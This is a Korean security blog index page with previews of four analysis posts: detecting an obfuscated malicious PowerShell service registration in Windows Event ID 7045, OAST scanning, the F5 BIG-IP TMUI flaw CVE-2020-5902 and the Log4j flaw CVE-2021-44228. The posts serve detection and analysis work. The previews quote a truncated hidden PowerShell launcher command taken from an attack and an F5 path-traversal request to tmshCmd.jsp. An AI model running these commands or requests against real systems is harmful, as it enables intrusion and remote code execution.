본문 바로가기
반응형

IT 보안53

난독화 악성 파워쉘 코드 탐지 및 분석 자료 악성 코드 탐지윈도우 이벤트에서 수상한 서비스 등록을 확인 및 난독화 코드 발견윈도우 이벤트 뷰어 - 시스템 - Event ID 7045(서비스 등록)**7045**04000x8080000000000000xxxxxxSystemPC123- xxrandomSevicenamexxx%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s... 2024. 9. 23.
OAST(Out-of-Band Application Security Testing) 취약점 스캔 OAST(Out-of-Band Application Security Testing)OAST(Out-of-Band Application Security Testing) 란대상이 테스터가 제어하는 ​​인프라로 콜백하도록 강제하여 웹 애플리케이션에서 악용 가능한 취약점을 찾는 방법입니다이런 유형의 테스트는 Project Discovery(interact.sh) 및 Port Swigger(Burp Collaborator)에서 제공하는 툴과 같은 OAST 툴을 통해 테스트 할 수 있습니다.OAST 툴은 점점 사용 빈도가 높아져가며 현재는 일반적인 검색 활동에 많이 사용됩니다.Project Discovery(interact.sh)는 현재 모든 Log4j(CVE-2021-44228) 공격의 약 절반과 Lacework.. 2024. 9. 23.
F5 BIG-IP TMUI RCE 취약점 (CVE-2020-5902) 분석 자료 BIG-IP 원격 코드 실행(RCE) 취약점(CVE-2020-5902)이 취약점은 2020년 7월에 발견되었고, 발견 당시 해당 취약점을 이용한 많은 공격이 이루어졌음그리고 취약점 Risk 점수가 10점으로 영향도가 많이 높음설명TMUI(Traffic Management User Interface) 취약점을 악용해 인증없이 원격에서 코드를 실행하여 파일 생성/삭제, 서비스 제어, 정보 탈취 등 여러 악성행위를 할 수 있으며, 추가 악성 행위로 내부 네트워크에 악성행위를 확장할 수 있음F5 BIG-IP 제품은 전세계적으로 많이 사용하는 제품이라 각별한 주의가 필요함   취약점 트래픽탐지 트래픽/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=w.. 2024. 9. 23.
Apache Log4j 취약점 (CVE-2021-44228) 분석 자료 CVE-2021-44228Apache Log4j2 버전 2.14.1 이하(보안 릴리스 2.3.1, 2.12.2 및 2.12.3 제외)에서 구성, 로그 메시지 및 매개변수에 사용된 JNDI를 이용한 취약점로그 메시지 또는 로그 메시지 매개변수를 제어할 수 있는 공격자는 메시지 조회 대체가 활성화된 경우 LDAP 서버에서 로드된 임의의 코드를 실행할 수 있습니다.JNDI (Java Naming and Directory Interface)Java로 작성된 애플리케이션을 DNS, LDAP, RMI, NDS 등과 같은 Naming/Directory 서비스에 연결하기 위한 APILDAP(Lightweight Directory Access Protocol)TCP/IP 위에서 디렉터리 서비스를 조회하고 수정하는 응용 .. 2024. 9. 23.
반응형